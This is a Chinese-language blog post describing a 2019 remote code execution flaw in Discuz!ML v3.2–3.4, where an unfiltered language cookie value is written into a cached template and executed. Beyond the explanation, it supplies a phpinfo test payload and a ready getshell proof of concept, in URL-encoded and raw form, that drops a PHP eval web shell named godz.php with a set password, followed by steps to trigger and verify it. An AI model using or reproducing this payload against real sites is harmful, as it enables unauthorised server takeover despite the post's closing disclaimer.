Discuz Ml v3.x 前台Getshell姿势 Discuz漏洞

1.漏洞描述

Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台,用于构建像“社交网络”这样的互联网社区。

2019年7月11日, Discuz!ML被发现存在一处远程代码执行漏洞,攻击者通过在请求流量的cookie字段中的language参数处插入构造的payload,进行远程代码执行利用,该漏洞利用方式简单,危害性较大。

2.原理

由于Discuz! ML对于cookie字段的不恰当处理造成的
cookie字段中的language参数未经过滤,直接被拼接写入缓存文件之中,
而缓存文件随后又被加载,从而造成代码执行

3.影响版本

Discuz! ML v.3.4
Discuz! ML v.3.3
Discuz! ML v.3.2

4.利用过程

简而言之,通过cookie传入payload,构造好的payload被写入template文件中:

注意这是国际版的,不是国内的那种,一般要有语言选择的才行,大部分都是国外的论坛
类似于有这种的
在这里插入图片描述

问题出在

XXXX_language=

测试PAYLOAD

    XXXX_language='.phpinfo().';

XXX自己改一下
在这里插入图片描述

GO一下看结果
在这里插入图片描述

4.getshell POC

%27.+file_put_contents%28%27godz.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522godz%2522%255d%29%253b%253f%253e%27%29%29.%27

原始的payload

'.+file_put_contents('godz.php',urldecode('<?php  eval($_GET["godz"]);?>')).'

在这里插入图片描述

访问网站生成木马文件,godz.php 密码为godz
验证木马

在这里插入图片描述


请勿用于非法用途


  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值